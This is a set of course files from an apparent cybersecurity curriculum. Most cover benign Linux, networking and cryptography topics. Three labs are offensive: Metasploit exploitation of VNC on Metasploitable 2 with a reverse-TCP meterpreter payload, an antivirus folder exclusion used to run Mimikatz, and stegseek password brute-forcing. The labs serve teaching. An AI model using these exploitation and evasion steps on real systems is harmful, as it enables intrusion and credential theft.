**b. Permanently Adding a Directory to `$PATH`** 80 | To make it permanent, add the above line to: 81 | - **Bash users:** `~/.bashrc` 82 | - **Zsh users:** `~/.zshrc` 83 | - **System-wide:** `/etc/profile` 84 | 85 | Example: 86 | ```bash 87 | echo 'export PATH=$PATH:/home/user/scripts' >> ~/.bashrc 88 | source ~/.bashrc 89 | ``` 90 | 91 | > **Activity:** Add a directory to your `$PATH` and run a script from it. 92 | 93 | --- 94 | 95 | ## **5. Executing a Script Without `./`** 96 | Normally, a script needs `./` to execute: 97 | ```bash 98 | ./myscript.sh 99 | ``` 100 | But if it's in `$PATH`, you can run it directly: 101 | ```bash 102 | myscript.sh 103 | ``` 104 | > **Activity:** Add a script directory to `$PATH` and execute a script without `./`. 105 | -------------------------------------------------------------------------------- /week1/manually_calculate_hash_value.md: -------------------------------------------------------------------------------- 1 | ### **🔹 How to Manually Calculate a Hashed Value & Identify Hash Corruption** 2 | 3 | A **hash function** takes an input and produces a fixed-size output (digest), ensuring data integrity. If even **one bit** of the input changes, the hash changes drastically. 4 | 5 | --- 6 | 7 | ## **📌 Manually Calculating a Hash** 8 | You can manually compute a hash using **mathematical steps** or **hashing tools** like OpenSSL, Python, or Linux commands. 9 | 10 | ### **🔹 1️⃣ Using OpenSSL (SHA-256)** 11 | Run this command in a terminal: 12 | ```bash 13 | openssl dgst -sha256 file.txt 14 | ``` 15 | ✅ **Example Output:** 16 | ``` 17 | SHA256(file.txt)= e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 18 | ``` 19 | This is the hash of `file.txt`. 20 | 21 | --- 22 | 23 | ### **🔹 2️⃣ Using Python (SHA-256)** 24 | ```python 25 | import hashlib 26 | 27 | # Read file and calculate SHA-256 hash 28 | with open("file.txt", "rb") as f: 29 | file_data = f.read() 30 | hash_value = hashlib.sha256(file_data).hexdigest() 31 | 32 | print("SHA-256 Hash:", hash_value) 33 | ``` 34 | ✅ **Output Example:** 35 | ``` 36 | SHA-256 Hash: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 37 | ``` 38 | 39 | --- 40 | 41 | ### **🔹 3️⃣ Manually Calculating Hash (Conceptual)** 42 | A simple **modular hashing function** example: 43 | ``` 44 | hash = (sum of ASCII values of characters) % 256 45 | ``` 46 | For `"hello"`: 47 | ``` 48 | h (104) + e (101) + l (108) + l (108) + o (111) = 532 49 | 532 % 256 = 20 → Hash value = 20 50 | ``` 51 | 🔹 **Note:** Real-world hashing (SHA, MD5) involves **bitwise operations, padding, and compression functions**. 52 | 53 | --- 54 | 55 | ## **📌 How to Identify a Corrupt Hash** 56 | ### **🔹 1️⃣ Compare Hash Before & After Transfer** 57 | 1. Generate the **original file hash**: 58 | ```bash 59 | sha256sum file.txt 60 | ``` 61 | 2. Transfer the file. 62 | 3. Generate the **new hash**: 63 | ```bash 64 | sha256sum file_received.txt 65 | ``` 66 | 4. Compare both hashes. 67 | - ✅ **If they match** → File is intact. 68 | - ❌ **If different** → File is corrupted or tampered. 69 | 70 | --- 71 | 72 | ### **🔹 2️⃣ Detect Hash Corruption in Digital Signatures** 73 | If a digital signature is based on a corrupted hash, it will **fail verification**. 74 | ```bash 75 | openssl dgst -sha256 -verify public_key.pem -signature file.sig file.txt 76 | ``` 77 | ✅ **Valid Signature Output:** 78 | ``` 79 | Verified OK 80 | ``` 81 | ❌ **Corrupted Signature Output:** 82 | ``` 83 | Verification Failure 84 | ``` 85 | 86 | --- 87 | 88 | ### **🔹 3️⃣ Check File Integrity with `diff`** 89 | Use `diff` to check differences in files: 90 | ```bash 91 | diff file.txt file_received.txt 92 | ``` 93 | If output shows **differences**, the file is corrupt. 94 | 95 | --- 96 | 97 | ## **🔹 Summary** 98 | | **Action** | **Command** | 99 | |------------|------------| 100 | | Generate hash (SHA-256) | `sha256sum file.txt` | 101 | | Compare hashes | `sha256sum file1.txt file2.txt` | 102 | | Verify digital signature | `openssl dgst -sha256 -verify` | 103 | | Check file corruption | `diff file1.txt file2.txt` | 104 | -------------------------------------------------------------------------------- /week2/day6_ip_roting.md: -------------------------------------------------------------------------------- 1 | ### **IP Routing in Linux** 2 | 3 | IP routing is a critical process in Linux networking that determines how network packets travel from one host to another, ensuring data reaches its correct destination. The Linux kernel handles routing, using routing tables to decide the best path for packets across a network. 4 | 5 | --- 6 | 7 | ### **Understanding Routing Tables** 8 | 9 | A routing table is essentially a set of rules that tells the system where to send packets based on their destination IP addresses. Each entry in the routing table specifies: 10 | - **Destination**: The network or host to route packets to. 11 | - **Gateway**: The next-hop address packets should take. 12 | - **Interface**: The network interface to use for the route. 13 | 14 | --- 15 | 16 | ### **Essential Commands for IP Routing** 17 | 18 | #### **1. View the Routing Table** 19 | To display the current routing table, use: 20 | ```bash 21 | ip route show 22 | ``` 23 | Example output: 24 | ``` 25 | default via 192.168.1.1 dev eth0 26 | 192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.100 27 | ``` 28 | Explanation: 29 | - **default via 192.168.1.1 dev eth0**: The default route (used for all packets without a specific route) goes through the gateway `192.168.1.1` on the interface `eth0`. 30 | - **192.168.1.0/24 dev eth0**: Packets destined for the `192.168.1.0/24` network are sent directly through `eth0`. 31 | 32 | #### **2. Add a New Route** 33 | To add a static route to a specific network: 34 | ```bash 35 | sudo ip route add 192.168.2.0/24 via 192.168.1.1 dev eth0 36 | ``` 37 | This command adds a route for the network `192.168.2.0/24`, specifying that packets should go through the gateway `192.168.1.1` on `eth0`. 38 | 39 | #### **3. Delete a Route** 40 | To delete a route: 41 | ```bash 42 | sudo ip route del 192.168.2.0/24 43 | ``` 44 | 45 | #### **4. Set a Default Gateway** 46 | To set or update the default route (default gateway): 47 | ```bash 48 | sudo ip route add default via 192.168.1.1 49 | ``` 50 | 51 | #### **5. Flush All Routes** 52 | To clear all routes from the routing table: 53 | ```bash 54 | sudo ip route flush table main 55 | ``` 56 | 57 | --- 58 | 59 | ### **Persistent Routing** 60 | 61 | Changes made with the `ip` command are temporary and will be lost after a reboot. To make routes permanent, they must be added to network configuration files. 62 | 63 | For example, in Debian-based distributions, add routes to `/etc/network/interfaces`: 64 | ```conf 65 | auto eth0 66 | iface eth0 inet static 67 | address 192.168.1.100 68 | netmask 255.255.255.0 69 | gateway 192.168.1.1 70 | up ip route add 192.168.2.0/24 via 192.168.1.1 dev eth0 71 | ``` 72 | 73 | On Red Hat-based systems, use `/etc/sysconfig/network-scripts/ifcfg-eth0`: 74 | ```conf 75 | DEVICE=eth0 76 | BOOTPROTO=none 77 | ONBOOT=yes 78 | IPADDR=192.168.1.100 79 | NETMASK=255.255.255.0 80 | GATEWAY=192.168.1.1 81 | ``` 82 | 83 | --- 84 | 85 | ### **Tips for IP Routing in Linux** 86 | - Use `traceroute` or `ping` to debug and verify network routes. 87 | - Use the `ip route` command for modern Linux systems, as it provides more functionality and is the preferred tool over `ifconfig` or `route`. 88 | - Always test new routes before making them permanent to ensure they work as intended. 89 | -------------------------------------------------------------------------------- /week1/day5_FHS.md: -------------------------------------------------------------------------------- 1 | ### **Understanding the Linux Directory Hierarchy** 2 | 3 | The **Linux directory hierarchy** organizes files and directories in a structured, tree-like format, making it easy to manage and locate system resources. This structure is based on the **Filesystem Hierarchy Standard (FHS)**, which defines a logical arrangement of directories. 4 | 5 | --- 6 | 7 | ### **Key Directories and Their Purpose** 8 | 9 | 1. **`/` (Root Directory)** 10 | - The topmost directory of the Linux filesystem. 11 | - All other files and directories are located under `/`. 12 | - Accessible only by the **root user** or users with elevated privileges for system-wide changes. 13 | 14 | --- 15 | 16 | 2. **`/home` (Home Directories)** 17 | - Contains individual user directories. 18 | - Each user gets a subdirectory to store personal files. 19 | - Example: `/home/username`. 20 | 21 | --- 22 | 23 | 3. **`/bin` (Essential Binary Executables)** 24 | - Stores **basic command-line utilities** required for the system to operate. 25 | - Examples: `ls`, `cat`, `cp`, `mv`. 26 | 27 | --- 28 | 29 | 4. **`/sbin` (System Administration Binaries)** 30 | - Contains **administrative commands** used by the root user for system management. 31 | - Examples: `ifconfig`, `reboot`, `fsck`. 32 | 33 | --- 34 | 35 | 5. **`/etc` (Configuration Files)** 36 | - Holds **system-wide configuration files** and settings. 37 | - Examples: `/etc/passwd`, `/etc/fstab`, `/etc/hosts`. 38 | 39 | --- 40 | 41 | 6. **`/var` (Variable Data)** 42 | - Used for files that change frequently, such as: 43 | - Logs: `/var/log` 44 | - Spool files: `/var/spool` 45 | - Temporary email storage. 46 | 47 | --- 48 | 49 | 7. **`/usr` (User Programs and Data)** 50 | - Stores **user-installed programs**, libraries, and documentation. 51 | - Common subdirectories: 52 | - `/usr/bin`: Additional command binaries. 53 | - `/usr/share`: Shared data like icons and documentation. 54 | 55 | --- 56 | 57 | 8. **`/lib` (Shared Libraries)** 58 | - Contains essential **shared libraries** required by binaries in `/bin` and `/sbin`. 59 | - Think of it as similar to `.dll` files in Windows. 60 | 61 | --- 62 | 63 | 9. **`/tmp` (Temporary Files)** 64 | - Stores **temporary files** created by programs and processes. 65 | - Files here are usually deleted after a reboot or when no longer needed. 66 | 67 | --- 68 | 69 | ### **Visualizing the Hierarchy** 70 | Here’s a simplified view of the directory hierarchy: 71 | 72 | ``` 73 | / 74 | ├── home/ 75 | │ ├── user1/ 76 | │ ├── user2/ 77 | ├── bin/ 78 | ├── sbin/ 79 | ├── etc/ 80 | ├── var/ 81 | │ ├── log/ 82 | │ ├── spool/ 83 | ├── usr/ 84 | │ ├── bin/ 85 | │ ├── share/ 86 | ├── lib/ 87 | ├── tmp/ 88 | ``` 89 | 90 | --- 91 | 92 | ### **Why Understanding the Hierarchy is Important** 93 | - **Efficient Navigation:** Knowing where files are located saves time. 94 | - **System Management:** Helps in troubleshooting and configuring system components. 95 | - **Avoid Errors:** Prevents accidental deletion or modification of critical files. 96 | 97 | By mastering the Linux directory hierarchy, you gain a deeper understanding of how the system operates and can work with it more efficiently! 98 | -------------------------------------------------------------------------------- /projects/vnc_task.md: -------------------------------------------------------------------------------- 1 | # Task: Exploiting VNC Service on Metasploitable 2 (Port 5900) 2 | 3 | ### Learning Objectives 4 | 5 | By the end of this exercise, students will be able to: 6 | 7 | * Perform service enumeration on a target system. 8 | * Identify the VNC service running on port `5900`. 9 | * Use Metasploit to exploit weak authentication in VNC. 10 | * Gain a remote shell session on Metasploitable 2. 11 | * Understand the importance of secure configurations for remote desktop services. 12 | 13 | 14 | 15 | ### Background 16 | 17 | Metasploitable 2 is an intentionally vulnerable Linux machine used for penetration testing practice. One of its services, **VNC (Virtual Network Computing)**, is exposed on port **5900**. VNC allows remote desktop access, but if misconfigured (like using weak authentication), attackers can gain control of the system. 18 | 19 | 20 | 21 | ### Lab Requirements 22 | 23 | * Kali Linux (Attacker) 24 | * Metasploitable 2 (Target) 25 | * Both machines on the same network (e.g., VirtualBox/VMware Host-only or NAT network). 26 | 27 | 28 | 29 | ### Step 1: Reconnaissance with Nmap 30 | 31 | Scan Metasploitable to find open ports: 32 | 33 | ```bash 34 | nmap -sV -p 5900 35 | ``` 36 | 37 | * `-sV` → Detect service version 38 | * `-p 5900` → Scan only the VNC port 39 | 40 | 👉 Expected Output: 41 | Shows `5900/tcp open vnc`. 42 | 43 | 44 | 45 | ### Step 2: Search for Vulnerabilities in Metasploit 46 | 47 | Start Metasploit: 48 | 49 | ```bash 50 | msfconsole 51 | ``` 52 | 53 | Search for VNC-related exploits: 54 | 55 | ```bash 56 | search vnc 57 | ``` 58 | 59 | 👉 You should find modules like: 60 | 61 | * `auxiliary/scanner/vnc/vnc_none_auth` 62 | * `exploit/multi/vnc/vnc_keyboard_exec` 63 | * `auxiliary/scanner/vnc/vnc_login` 64 | 65 | 66 | 67 | ### Step 3: Use the VNC Authentication Bypass Module 68 | 69 | Select the module: 70 | 71 | ```bash 72 | use auxiliary/scanner/vnc/vnc_none_auth 73 | ``` 74 | 75 | Set target IP: 76 | 77 | ```bash 78 | set RHOSTS 79 | run 80 | ``` 81 | 82 | 👉 If vulnerable, it confirms **no authentication is required**. 83 | 84 | 85 | 86 | ### Step 4: Exploit and Gain Access 87 | 88 | Now, attempt to interact with the session: 89 | 90 | ```bash 91 | use exploit/multi/vnc/vnc_keyboard_exec 92 | set RHOST 93 | set PAYLOAD linux/x86/meterpreter/reverse_tcp 94 | set LHOST 95 | exploit 96 | ``` 97 | 98 | 👉 Expected Result: 99 | You get a **Meterpreter session** or a remote shell on Metasploitable. 100 | 101 | 102 | 103 | ### Step 5: Post-Exploitation 104 | 105 | Once inside: 106 | 107 | ```bash 108 | shell 109 | whoami 110 | uname -a 111 | ``` 112 | 113 | * Confirm you have remote access. 114 | * Enumerate the system. 115 | 116 | 117 | ### Step 6: Discussion / Mitigation 118 | 119 | * Why is running VNC without authentication dangerous? 120 | * How should VNC be secured? (passwords, encryption, network restrictions, VPNs). 121 | 122 | 123 | 124 | ### Deliverables for Students 125 | 126 | * Nmap scan result screenshot. 127 | * Proof of successful VNC exploitation (shell access). 128 | * Short write-up: *“How could this vulnerability be prevented in a real system?”* 129 | -------------------------------------------------------------------------------- /week2/day5_dhcp.md: -------------------------------------------------------------------------------- 1 | ### **Dynamic Host Configuration Protocol (DHCP) in Linux** 2 | 3 | DHCP (Dynamic Host Configuration Protocol) is an essential protocol for managing and automating IP address assignments in a network. In Linux, it simplifies network management by dynamically allocating IP addresses and providing additional configuration details such as DNS servers, gateway addresses, and more. 4 | 5 | --- 6 | 7 | ### **How DHCP Works** 8 | 1. **Client Request**: A client device sends a broadcast request (DHCPDISCOVER) asking for an IP address. 9 | 2. **Server Offer**: A DHCP server responds with an available IP address (DHCPOFFER). 10 | 3. **Client Acceptance**: The client accepts the offer by sending a DHCPREQUEST message. 11 | 4. **Server Acknowledgment**: The server confirms the lease by sending a DHCPACK message. 12 | 13 | --- 14 | 15 | ### **Setting Up a DHCP Server in Linux** 16 | 17 | #### **1. Installation** 18 | On Debian-based systems (like Ubuntu): 19 | ```bash 20 | sudo apt-get install isc-dhcp-server 21 | ``` 22 | 23 | #### **2. Configuration** 24 | After installation, configure the DHCP server by editing its main configuration file: 25 | ```bash 26 | sudo nano /etc/dhcp/dhcpd.conf 27 | ``` 28 | 29 | **Basic Configuration Example:** 30 | ```conf 31 | # Define the subnet and its IP range 32 | subnet 192.168.1.0 netmask 255.255.255.0 { 33 | range 192.168.1.100 192.168.1.200; 34 | option routers 192.168.1.1; # Default gateway 35 | option domain-name-servers 8.8.8.8, 8.8.4.4; # DNS servers 36 | option domain-name "example.com"; # Domain name 37 | default-lease-time 600; # Lease duration in seconds 38 | max-lease-time 7200; # Maximum lease duration 39 | } 40 | ``` 41 | 42 | Save and close the file after editing. 43 | 44 | #### **3. Restart the DHCP Service** 45 | To apply changes, restart the DHCP service: 46 | ```bash 47 | sudo systemctl restart isc-dhcp-server 48 | ``` 49 | 50 | #### **4. Verify the Configuration** 51 | Check for errors in the configuration: 52 | ```bash 53 | sudo dhcpd -t 54 | ``` 55 | 56 | --- 57 | 58 | ### **Key Points to Remember** 59 | - **Static IP for Server**: Ensure the DHCP server itself has a static IP address for stable operation. 60 | - **Leases**: DHCP leases are temporary. The lease duration determines how long a device can use the assigned IP. 61 | - **Logs**: Monitor logs for DHCP activity: 62 | ```bash 63 | tail -f /var/log/syslog 64 | ``` 65 | 66 | --- 67 | 68 | ### **DHCP Client on Linux** 69 | To configure a Linux machine as a DHCP client: 70 | 1. Open the network configuration file, typically located in `/etc/network/interfaces` (Debian-based) or `/etc/sysconfig/network-scripts/` (Red Hat-based). 71 | 2. Set the interface to use DHCP: 72 | 73 | **Example (Debian-based):** 74 | ```conf 75 | auto eth0 76 | iface eth0 inet dhcp 77 | ``` 78 | 79 | 3. Restart the network service: 80 | ```bash 81 | sudo systemctl restart networking 82 | ``` 83 | 84 | --- 85 | 86 | ### **Troubleshooting Tips** 87 | - **No IP Address Assigned**: Verify the DHCP server is running and reachable. 88 | - **Conflict Issues**: Check for overlapping IP ranges in your network. 89 | - **Test Connectivity**: Use `ping`, `ifconfig`, or `ip addr` to verify network settings. 90 | 91 | --- 92 | -------------------------------------------------------------------------------- /projects/stegganography.md: -------------------------------------------------------------------------------- 1 | ### **Lesson 1: Introduction to Steganography** 2 | **Objective:** Students will understand the concept of steganography, its purpose, and how it differs from cryptography. 3 | 4 | **Activities:** 5 | 1. **Presentation & Discussion** 6 | - Define steganography and its importance in cybersecurity. 7 | - Compare steganography vs. cryptography with real-world examples. 8 | - Show historical examples (e.g., invisible ink, microdots, null ciphers). 9 | 10 | 2. **Hands-on Practical: Identifying Hidden Data** 11 | - Provide students with a set of images, some with hidden data and some without. 12 | - Use tools like `Stegsolve` to analyze and determine if an image contains hidden messages. 13 | - Encourage students to think about steganography detection techniques. 14 | 15 | --- 16 | 17 | ### **Lesson 2: Image Steganography** 18 | **Objective:** Students will learn how to hide and extract messages from images. 19 | 20 | **Activities:** 21 | 1. **Least Significant Bit (LSB) Insertion** 22 | - Explain how the least significant bit in pixel values is modified to hide data. 23 | - Demonstrate this manually by converting pixel values to binary and altering them. 24 | 25 | 2. **Practical Exercise: Using Steghide** 26 | - Install `Steghide` on Kali Linux (`sudo apt install steghide`). 27 | - Use the following commands to hide and extract data from an image: 28 | 29 | **Hiding data:** 30 | ```bash 31 | steghide embed -cf image.jpg -ef secret.txt -p password 32 | ``` 33 | **Extracting data:** 34 | ```bash 35 | steghide extract -sf image.jpg -p password 36 | ``` 37 | 38 | 3. **Stegsolve for Image Analysis** 39 | - Use `Stegsolve` to analyze different image layers. 40 | - Students inspect images for anomalies. 41 | 42 | --- 43 | 44 | ### **Lesson 3: Audio Steganography** 45 | **Objective:** Students will hide and extract messages from audio files. 46 | 47 | **Activities:** 48 | 1. **Understanding Audio Steganography** 49 | - Explain how modifying frequency or amplitude can embed hidden data. 50 | - Discuss tools like `Sonic Visualiser` and `DeepSound`. 51 | 52 | 2. **Practical Exercise: Using DeepSound** 53 | - Install `DeepSound` on Windows (or use Wine on Kali). 54 | - Hide text inside an audio file and extract it. 55 | 56 | 3. **Analyzing Audio Files with Sonic Visualiser** 57 | - Open an audio file and visualize waveforms and spectrograms. 58 | - Try to detect hidden messages. 59 | 60 | --- 61 | 62 | ### **Lesson 4: Advanced Steganography & Detection Techniques** 63 | **Objective:** Students will learn advanced steganography techniques and how forensic analysts detect hidden messages. 64 | 65 | **Activities:** 66 | 1. **Exploring Different Steganography Techniques** 67 | - Discuss Redundant Pattern Encoding, Encrypt & Scatter methods. 68 | 69 | 2. **Practical Exercise: Steganalysis** 70 | - Use `stegdetect` to analyze images: 71 | ```bash 72 | stegdetect image.jpg 73 | ``` 74 | - Perform statistical analysis on modified images. 75 | 76 | 3. **Red Team vs. Blue Team Exercise** 77 | - Divide students into attackers (hiding messages) and defenders (detecting them). 78 | - Use a set of images/audio files to challenge each other. 79 | -------------------------------------------------------------------------------- /week1/crypto_project.md: -------------------------------------------------------------------------------- 1 | ### **Beginner Cryptography Project: Secure File Transfer with Encryption & Digital Signatures** 2 | 3 | This project will help students apply cryptography concepts practically by encrypting, signing, and verifying files before securely transferring them. 4 | 5 | --- 6 | 7 | ## **📌 Project: Secure File Transfer System** 8 | ### **🛠 Goal:** 9 | - Encrypt a file before sending it. 10 | - Sign the file using a digital signature. 11 | - Verify the signature and decrypt the file upon receipt. 12 | 13 | --- 14 | 15 | ## **1️⃣ Project Breakdown** 16 | ### **📌 Step 1: Generate RSA Keys** 17 | Each user needs a **public-private key pair** for encryption and signing. 18 | 19 | ```bash 20 | # Generate private key (receiver) 21 | openssl genpkey -algorithm RSA -out receiver_private.pem 22 | 23 | # Extract public key (for sender to use) 24 | openssl rsa -pubout -in receiver_private.pem -out receiver_public.pem 25 | 26 | # Generate private key (sender) 27 | openssl genpkey -algorithm RSA -out sender_private.pem 28 | 29 | # Extract public key (for receiver to use) 30 | openssl rsa -pubout -in sender_private.pem -out sender_public.pem 31 | ``` 32 | 33 | --- 34 | 35 | ### **📌 Step 2: Encrypt the File (Sender)** 36 | Before sending a file, encrypt it using the **receiver's public key** so only the receiver can decrypt it. 37 | 38 | ```bash 39 | # Encrypt the file with the receiver's public key 40 | openssl rsautl -encrypt -pubin -inkey receiver_public.pem -in secret.txt -out secret.enc 41 | ``` 42 | 43 | --- 44 | 45 | ### **📌 Step 3: Create a Digital Signature (Sender)** 46 | To ensure the file is authentic and not tampered with, the sender signs the encrypted file using their **private key**. 47 | 48 | ```bash 49 | # Create a signature for the encrypted file 50 | openssl dgst -sha256 -sign sender_private.pem -out secret.sig secret.enc 51 | ``` 52 | 53 | --- 54 | 55 | ### **📌 Step 4: Send Files Securely** 56 | The sender now sends **two files** to the receiver: 57 | 1. `secret.enc` (Encrypted file) 58 | 2. `secret.sig` (Digital signature) 59 | 60 | --- 61 | 62 | ### **📌 Step 5: Verify the Signature (Receiver)** 63 | Before decrypting, the receiver **verifies** the sender's signature using the sender’s **public key**. 64 | 65 | ```bash 66 | # Verify the signature 67 | openssl dgst -sha256 -verify sender_public.pem -signature secret.sig secret.enc 68 | ``` 69 | ✅ If the signature is valid, the file is authentic and not modified. 70 | 71 | --- 72 | 73 | ### **📌 Step 6: Decrypt the File (Receiver)** 74 | After verification, the receiver decrypts the file using their **private key**. 75 | 76 | ```bash 77 | # Decrypt the file with the receiver’s private key 78 | openssl rsautl -decrypt -inkey receiver_private.pem -in secret.enc -out secret_decrypted.txt 79 | ``` 80 | ✅ The original file is now recovered. 81 | 82 | --- 83 | 84 | ## **2️⃣ Project Enhancements** 85 | To take it further: 86 | - Build a **Python script** to automate encryption, signing, and verification. 87 | - Implement **AES symmetric encryption** for large files instead of RSA. 88 | - Use a **web interface** to encrypt, sign, and verify files. 89 | 90 | --- 91 | 92 | ## **3️⃣ Learning Outcomes** 93 | ✔ Understand **RSA encryption** and **digital signatures**. 94 | ✔ Use **OpenSSL for secure file transfers**. 95 | ✔ Verify data authenticity with **signatures**. 96 | ✔ Gain hands-on cryptography experience. 97 | -------------------------------------------------------------------------------- /projects/mimikaz_projects.md: -------------------------------------------------------------------------------- 1 | # Lab Assignment: Excluding a Folder from Antivirus Scanning & Running Mimikatz 2 | 3 | ### **Background** 4 | 5 | Malware often uses different methods to evade antivirus (AV) detection. One simple trick is storing and running programs from folders excluded from AV scanning. Security software won’t scan excluded folders, making it possible for malicious tools to run undetected. 6 | 7 | In this lab, you will demonstrate this concept by excluding a folder from AV scanning and executing **Mimikatz** (a well-known post-exploitation tool). 8 | 9 | Mimikatz is a powerful tool used by attackers to steal passwords. You must only use it in your **controlled lab VM** and **never on real or production systems**. 10 | 11 | 12 | 13 | ### **Learning Objectives** 14 | 15 | 1. Understand how antivirus exclusions work. 16 | 2. Practice configuring AV exclusions on Windows. 17 | 3. Demonstrate how attackers can abuse exclusions to run tools like Mimikatz. 18 | 19 | 20 | 21 | ### **Specifications** 22 | 23 | #### 1. Goal 24 | 25 | * Exclude a folder from AV scanning. 26 | * Show that Mimikatz is blocked outside the excluded folder. 27 | * Run Mimikatz successfully inside the excluded folder. 28 | 29 | 30 | 31 | #### 2. Lab Setup 32 | 33 | * Windows Virtual Machine (Windows 10/11, or Windows Server) 34 | * Antivirus enabled (Windows Defender recommended) 35 | * Administrative privileges on the VM 36 | * Download Mimikatz from its **official GitHub repository**: 37 | 🔗 [https://github.com/gentilkiwi/mimikatz](https://github.com/gentilkiwi/mimikatz) 38 | 39 | 40 | 41 | #### 3. Configure Folder Exclusion 42 | 43 | 1. Create a folder (example: `C:\LabExcluded`) 44 | 2. Open **Windows Security** → **Virus & threat protection** 45 | 3. Under **Virus & threat protection settings**, click **Manage settings** 46 | 4. Scroll to **Exclusions → Add or remove exclusions** 47 | 5. Add your folder (`C:\LabExcluded`) 48 | 49 | 50 | 51 | #### 4. Exercise Steps 52 | 53 | 1. **Download Mimikatz** 54 | 55 | * Try to extract or run Mimikatz from **Downloads folder** (or Desktop). 56 | * Windows Defender should block it. 57 | * Screenshot this. 58 | 59 | 2. **Move to Excluded Folder** 60 | 61 | * Place Mimikatz inside your `C:\LabExcluded` folder. 62 | * Run it from inside this excluded folder. 63 | * This time, Mimikatz should run successfully. 64 | 65 | 3. **Demonstrate Execution** 66 | 67 | * Launch `mimikatz.exe` 68 | * Run a harmless command inside Mimikatz (e.g., `version` or `help`) just to prove execution. 69 | * Do **NOT** run password-dumping commands for this exercise. 70 | 71 | 72 | 73 | #### 5. Validation 74 | 75 | * ✅ Show that Mimikatz is blocked outside the excluded folder. 76 | * ✅ Show that Mimikatz runs successfully inside the excluded folder. 77 | * ✅ Provide screenshots (or a video) of both cases. 78 | 79 | 80 | #### 6. Submission Requirements 81 | 82 | * A **short report** (1–2 pages) including: 83 | 84 | * Steps you followed. 85 | * Screenshots showing folder exclusion, failed execution, and successful execution. 86 | * A brief explanation: *“Why excluding folders from AV scanning is risky and how attackers abuse this technique.”* 87 | 88 | * A **video recording** (optional, for extra credit): 89 | 90 | * Show exclusion setup. 91 | * Show Defender blocking Mimikatz outside excluded folder. 92 | * Show successful execution inside excluded folder. 93 | -------------------------------------------------------------------------------- /week2/day7_dns.md: -------------------------------------------------------------------------------- 1 | ### **DNS Resolution in Linux Networking** 2 | 3 | The Domain Name System (DNS) simplifies networking by translating human-readable domain names (like `www.example.com`) into machine-readable IP addresses (like `192.0.2.1`). This process, called DNS resolution, is vital for connecting to websites and other network services. 4 | 5 | --- 6 | 7 | ### **How DNS Resolution Works** 8 | 9 | 1. **Querying the Resolver**: When a Linux application needs to resolve a domain name, it queries the DNS resolver. 10 | 2. **Checking Local Cache**: The resolver checks its cache for previously resolved domain names to avoid unnecessary lookups. 11 | 3. **Using `/etc/resolv.conf`**: If the cache doesn’t contain the result, the resolver refers to the `/etc/resolv.conf` file to determine which DNS servers to query. 12 | 4. **DNS Server Lookup**: The specified DNS server resolves the domain name into an IP address and sends it back to the resolver. 13 | 5. **Connecting to the IP**: The application uses the resolved IP address to establish a connection. 14 | 15 | --- 16 | 17 | ### **Essential DNS Commands in Linux** 18 | 19 | #### **1. Query DNS Using `nslookup`** 20 | The `nslookup` command queries DNS servers to fetch domain-to-IP mappings. 21 | ```bash 22 | nslookup www.example.com 23 | ``` 24 | Example output: 25 | ``` 26 | Server: 8.8.8.8 27 | Address: 8.8.8.8#53 28 | 29 | Non-authoritative answer: 30 | Name: www.example.com 31 | Address: 93.184.216.34 32 | ``` 33 | 34 | #### **2. Query DNS Using `dig`** 35 | The `dig` (Domain Information Groper) command is more feature-rich than `nslookup`. 36 | ```bash 37 | dig www.example.com 38 | ``` 39 | Example output: 40 | ``` 41 | ; <<>> DiG 9.11.3-1ubuntu1.15-Ubuntu <<>> www.example.com 42 | ;; ANSWER SECTION: 43 | www.example.com. 3600 IN A 93.184.216.34 44 | ``` 45 | Key fields: 46 | - **ANSWER SECTION**: Contains the resolved IP address (`93.184.216.34` in this example). 47 | - **TTL (Time to Live)**: Indicates how long the result can be cached. 48 | 49 | #### **3. Check Local DNS Configuration** 50 | To view or edit DNS settings, use `/etc/resolv.conf`: 51 | ```bash 52 | cat /etc/resolv.conf 53 | ``` 54 | Example content: 55 | ``` 56 | nameserver 8.8.8.8 57 | nameserver 8.8.4.4 58 | ``` 59 | This file lists the DNS servers used by the system (in this case, Google’s public DNS servers). 60 | 61 | #### **4. Test DNS Resolution with `ping`** 62 | ```bash 63 | ping www.example.com 64 | ``` 65 | This verifies both DNS resolution and network connectivity. 66 | 67 | --- 68 | 69 | ### **Troubleshooting DNS Issues** 70 | 71 | 1. **Check DNS Configuration**: Ensure `/etc/resolv.conf` points to a valid DNS server. 72 | 2. **Test with Alternate Servers**: Use public DNS servers like Google (`8.8.8.8`) or Cloudflare (`1.1.1.1`). 73 | 3. **Clear DNS Cache**: 74 | - For systems running `systemd-resolved`: 75 | ```bash 76 | sudo systemctl restart systemd-resolved 77 | ``` 78 | - For other systems, manually restart the DNS resolver. 79 | 4. **Verify Network Connectivity**: Confirm that the system can reach the DNS server using `ping`. 80 | 81 | --- 82 | 83 | ### **Practical Use Cases** 84 | 85 | - **Network Troubleshooting**: Resolve domain name issues with `nslookup` or `dig`. 86 | - **Web Server Setup**: Verify DNS records for domains hosted on your server. 87 | - **Custom DNS Configuration**: Modify `/etc/resolv.conf` to use faster or more secure DNS servers. 88 | -------------------------------------------------------------------------------- /projects/steghide-task.md: -------------------------------------------------------------------------------- 1 | # Challenge 1: The Secret Spy Message 2 | 3 | A spy needs to send a secret message to their handler without raising suspicion. The message is hidden inside an innocent-looking image. Your goal is to extract the image. 4 | 5 | ## Task 1: 6 | - Use ```steghide``` to extract the hidden message. 7 | - If the password is unknown, attempt common password lists or brute force methods using a ```stegseek``` tool. 8 | 9 | ## Using a Wordlist Attack (Bruteforce with Stegseek) 10 | Stegseek automates brute-forcing passwords against steghide-protected images. 11 | ## 1. Install Stegseek 12 | Install Stegseek from this github page https://github.com/RickdeJager/stegseek 13 | 14 | Link to the image https://www.dropbox.com/scl/fi/1ovp3i2b44hp7qom58383/sample.zip?rlkey=4yfdu8tyr5sog792qpavrmeu2&st=ekm1enbr&dl=0 15 | Unzip the file to get the image with hidden content. 16 | 17 | ## 2. Use a Wordlist to Crack the Password 18 | ```bash 19 | time stegseek image.jpeg worldlist 20 | ``` 21 | 22 | ## 3. You should be able to find the hidden message and the contents. 23 | Get the hidden content and submit your response on this form https://docs.google.com/forms/d/e/1FAIpQLScPeTRSHloUYzJTJR_aJ6Nj69Y24u7UAcUgkkvsvWDREOw4Nw/viewform?usp=sharing 24 | 25 | ## Task 2: 26 | - Download the file from Dropbox from the following link https://www.dropbox.com/scl/fi/fkkch4ir2d08ft7ilz2cl/sample-2.txt?rlkey=17uceiu44g78jw5r6gb4608oj&st=7x7y0gd7&dl=0 